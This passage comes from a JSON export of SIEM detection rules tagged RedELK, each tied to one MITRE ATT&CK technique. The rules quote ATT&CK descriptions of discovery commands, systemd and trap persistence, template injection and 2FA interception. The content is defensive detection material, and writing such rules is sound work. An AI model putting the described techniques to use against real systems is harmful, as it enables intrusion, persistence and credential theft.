actions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1016","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1016] System Network Configuration Discovery","query":"threat.technique.id: T1016","references":["https://attack.mitre.org/techniques/T1016"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1016","name":"System Network Configuration Discovery","id":"T1016"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.[1][2][3]\nUtilities and commands that acquire this information include netstat, \"net use,\" and \"net session\" with Net. In Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\".","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1049","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1049] System Network Connections Discovery","query":"threat.technique.id: T1049","references":["https://attack.mitre.org/techniques/T1049"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1049","name":"System Network Connections Discovery","id":"T1049"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nUtilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1033","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1033] System Owner/User Discovery","query":"threat.technique.id: T1033","references":["https://attack.mitre.org/techniques/T1033"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1033","name":"System Owner/User Discovery","id":"T1033"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using Tasklist, and \"net start\" using Net, but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1007","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1007] System Service Discovery","query":"threat.technique.id: T1007","references":["https://attack.mitre.org/techniques/T1007"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1007","name":"System Service Discovery","id":"T1007"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.[1] Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as Disk Structure Wipe or Inhibit System Recovery, to hasten the intended effects on system availability.[2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1529","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1529] System Shutdown/Reboot","query":"threat.technique.id: T1529","references":["https://attack.mitre.org/techniques/T1529"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1529","name":"System Shutdown/Reboot","id":"T1529"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. [1] [2]\nSystem time information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. [2] The information could be useful for performing other techniques, such as executing a file with a Scheduled Task/Job [3], or to discover locality information based on time zone to assist in victim targeting.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1124","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1124] System Time Discovery","query":"threat.technique.id: T1124","references":["https://attack.mitre.org/techniques/T1124"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1124","name":"System Time Discovery","id":"T1124"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.[1][2] Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\nExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.\nExecReload directive covers when a service restarts.\nExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.[3][4][5][6]\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.[7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1501","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1501] Systemd Service","query":"threat.technique.id: T1501","references":["https://attack.mitre.org/techniques/T1501","https://attack.mitre.org/techniques/T1543/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1501","name":"Systemd Service","id":"T1501"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses Shortcut Modification of directory .LNK files that use Masquerading to look like the real directories, which are hidden through Hidden Files and Directories. The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. [1]\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1080","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1080] Taint Shared Content","query":"threat.technique.id: T1080","references":["https://attack.mitre.org/techniques/T1080"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1080","name":"Taint Shared Content","id":"T1080"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. [1]\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. [2] These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. [3] Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. [4]\nThis technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. [5] [6] [7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1221","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1221] Template Injection","query":"threat.technique.id: T1221","references":["https://attack.mitre.org/techniques/T1221"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1221","name":"Template Injection","id":"T1221"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1072","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1072] Third-party Software","query":"threat.technique.id: T1072","references":["https://attack.mitre.org/techniques/T1072"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1072","name":"Third-party Software","id":"T1072"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1072","name":"Third-party Software","id":"T1072"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. [1] W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. [2]\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. [2] The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. [2]\nAdversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1209","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1209] Time Providers","query":"threat.technique.id: T1209","references":["https://attack.mitre.org/techniques/T1209","https://attack.mitre.org/techniques/T1547/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1209","name":"Time Providers","id":"T1209"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1537","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1537] Transfer Data to Cloud Account","query":"threat.technique.id: T1537","references":["https://attack.mitre.org/techniques/T1537"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1537","name":"Transfer Data to Cloud Account","id":"T1537"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\nTimestomping may be used along with file name Masquerading to hide malware and tools.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1099","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1099] Timestomp","query":"threat.technique.id: T1099","references":["https://attack.mitre.org/techniques/T1099","https://attack.mitre.org/techniques/T1070/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1099","name":"Timestomp","id":"T1099"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.[1][2] By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1493","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1493] Transmitted Data Manipulation","query":"threat.technique.id: T1493","references":["https://attack.mitre.org/techniques/T1493","https://attack.mitre.org/techniques/T1565/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1493","name":"Transmitted Data Manipulation","id":"T1493"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.[1][2][3][4] These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1127","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1127] Trusted Developer Utilities","query":"threat.technique.id: T1127","references":["https://attack.mitre.org/techniques/T1127"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1127","name":"Trusted Developer Utilities","id":"T1127"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1127","name":"Trusted Developer Utilities","id":"T1127"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1154","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1154] Trap","query":"threat.technique.id: T1154","references":["https://attack.mitre.org/techniques/T1154","https://attack.mitre.org/techniques/T1546/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1154","name":"Trap","id":"T1154"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1154","name":"Trap","id":"T1154"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, Valid Accounts used by the other party for access to internal network systems may be compromised and used.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1199","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1199] Trusted Relationship","query":"threat.technique.id: T1199","references":["https://attack.mitre.org/techniques/T1199"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1199","name":"Trusted Relationship","id":"T1199"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.\nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. [1]\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). [2]\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1111","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1111] Two-Factor Authentication Interception","query":"threat.technique.id: T1111","references":["https://attack.mitre.org/techniques/T1111"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1111","name":"Two-Factor Authentication Interception","id":"T1111"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. For example, AWS GuardDuty is not supported in every region.[1]\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through Resource Hijacking, which can cost organizations substantial amounts of money over time depending on the processing power used.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1535","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1535] Unused/Unsupported Cloud Regions","query":"threat.technique.id: T1535","references":["https://attack.mitre.org/techniques/T1535"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1535","name":"Unused/Unsupported Cloud Regions","id":"T1535"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.\nWhile User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1204","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1204] User Execution","query":"threat.technique.id: T1204","references":["https://attack.mitre.org/techniques/T1204"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1204","name":"User Execution","id":"T1204"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088[1] or port 587[2] as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1065","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1065] Uncommonly Used Port","query":"threat.technique.id: T1065","references":["https://attack.mitre.org/techniques/T1065","https://attack.mitre.org/techniques/T1571"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1065","name":"Uncommonly Used Port","id":"T1065"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1078","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1078] Valid Accounts","query":"threat.technique.id: T1078","references":["https://attack.mitre.org/techniques/T1078"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE 